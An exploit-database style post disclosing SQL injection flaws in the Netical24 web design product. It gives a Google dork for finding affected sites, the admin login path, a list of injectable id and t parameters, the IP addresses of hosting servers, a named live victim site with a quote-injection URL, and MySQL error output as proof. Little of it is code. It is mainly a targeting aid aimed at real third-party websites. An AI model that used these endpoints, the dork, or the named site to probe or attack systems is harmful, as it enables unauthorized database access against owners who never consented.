facebook facebook twitter rss

Netical24 Web Design SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-01-2019
# Exploit Title : Netical24 Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 10/01/2019
# Vendor Homepage : netical24.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Diseño y Desarrollo Web:Netical24
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-netical24-web-design-sql-injection-vulnerability.html

######################################################

# Admin Panel Login Path :
*************************

/admin

# SQL Injection Exploit :
***********************

/ver_noticia.php?id=[SQL Injection]

/ver_documento.php?id=[SQL Injection]

/ver_convenio.php?id=[SQL Injection]

/ver_noticia.php?id=[SQL Injection]

/ver_circular.php?id=[SQL Injection]

/ver_evento.php?id=[SQL Injection]

/ver_convenio.php?id=[SQL Injection]

/formacion.php?t=[SQL Injection]

######################################################

# Example Vulnerable Site :
*************************

Note : (212.18.224.226) => There are 148 domains hosted on this server.

Note : (109.73.169.144) => There are 132 domains hosted on this server.

[+] trabajosocialleon.org/ver_noticia.php?id=93%27 =>

[ Proof of Concept ] => archive.fo/ZnYWd

######################################################

# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for
the right syntax to use near '\'' at line 1

You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '\' AND
public=1 AND finalizado=0 ORDER BY fecha DESC' at line 1

######################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

######################################################

Like us on Facebook :